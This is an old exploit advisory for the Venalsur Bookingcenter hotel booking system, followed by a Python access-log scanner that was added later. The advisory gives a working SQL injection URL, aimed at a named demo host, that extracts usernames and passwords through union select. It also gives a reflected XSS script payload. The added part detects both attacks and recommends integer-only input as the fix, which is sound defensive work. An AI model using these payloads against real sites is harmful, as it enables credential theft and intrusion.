Booking System for Hotels Group powered by Venalsur Bookingcenter XSS/SQL injection vulnerability!
------------------------------------------------------------------------------------------------------
Author: d3b4g

Greetz: str0ke,Darkc0de.com,rez0rn,draconyx,godinlaw,hatebreeder And all my friends
Site : www.bl4ck3nd.info
Contact: bl4ckend[at]gmail[dot]com
-------------------------------------------------------------------
Dork: N/A
-------------------------------------------------------------------
Affected software:
-----------------
Application : Booking System for Hotels Group powered by Venalsur Bookingcenter
URL : http://www.bookingcentre.eu
===================================================================

SQL injection
=============

Exploit: http://site.com/www_en/cadena_ofertas_ext.php?OfertaID= [sql]

Demo : http://demo.hotelsadmin.com/www_en/cadena_ofertas_ext.php?OfertaID=-1+union+all+select+1,2,3,concat(username,password),5,6,7,8,9,10,11+from+members/*

------------------------------------------------------------------------

XSS
===

Exploit: http://demo.hotelsadmin.com/www_en/cadena_ofertas_ext.php?OfertaID=<script>alert(40323.6285846991)</script>

=========================================================================
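
Both issues go through the OfertaID parameter of cadena_ofertas_ext.php, so requests to that script can be checked in web server access logs. The Python below is an added example, not part of the original advisory; it assumes combined-format access logs and that a legitimate OfertaID is a plain integer, and the sample log lines are constructed.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

ENDPOINT = "cadena_ofertas_ext.php"  # script named in the advisory
PARAM = "OfertaID"                   # parameter named in the advisory
# Assumption: a legitimate OfertaID is a short non-negative integer.
VALID_ID = re.compile(r"\d{1,10}")
MARKUP = re.compile(r"[<>]")  # angle brackets never belong in an ID
SQL_HINT = re.compile(r"\b(union|select|concat|from)\b|/\*|--|'", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(value):
    """Classify one OfertaID value, decoding once more to catch double encoding."""
    value = unquote(value).strip()
    if VALID_ID.fullmatch(value):
        return "ok"
    if MARKUP.search(value):
        return "xss"
    if SQL_HINT.search(value):
        return "sqli"
    return "invalid"

def scan(lines):
    """Yield (line_number, verdict) for each suspicious OfertaID request."""
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.endswith("/" + ENDPOINT):
            continue
        # parse_qs percent-decodes the query and turns '+' into a space.
        for value in parse_qs(url.query, keep_blank_values=True).get(PARAM, []):
            if (verdict := classify(value)) != "ok":
                yield number, verdict

# Constructed sample lines in combined log format, not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [29/Oct/2008:10:00:01 +0000] "GET /www_en/cadena_ofertas_ext.php?OfertaID=12 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [29/Oct/2008:10:00:09 +0000] "GET /www_en/cadena_ofertas_ext.php?OfertaID=-1+union+all+select+1,2,3 HTTP/1.1" 200 4811',
    '198.51.100.7 - - [29/Oct/2008:10:00:15 +0000] "GET /www_en/cadena_ofertas_ext.php?OfertaID=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 4790',
    '198.51.100.7 - - [29/Oct/2008:10:00:21 +0000] "GET /www_en/cadena_ofertas_ext.php?OfertaID=%253Cscript%253E HTTP/1.1" 200 4790',
    '203.0.113.5 - - [29/Oct/2008:10:00:30 +0000] "GET /www_en/index.php?OfertaID=abc HTTP/1.1" 200 900',
    '203.0.113.9 - - [29/Oct/2008:10:00:41 +0000] "GET /www_en/cadena_ofertas_ext.php?OfertaID=abc HTTP/1.1" 200 4790',
]

if __name__ == "__main__":
    for number, verdict in scan(SAMPLE_LOG):
        print(f"line {number}: {verdict}")
```

The same integer-only rule is the server-side fix: reject or cast any OfertaID that is not a plain integer before it reaches the SQL query or the rendered page.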

Proud to be a Maldivian :):) Happy new Maldives [29.10.2008]

# milw0rm.com [2008-10-29]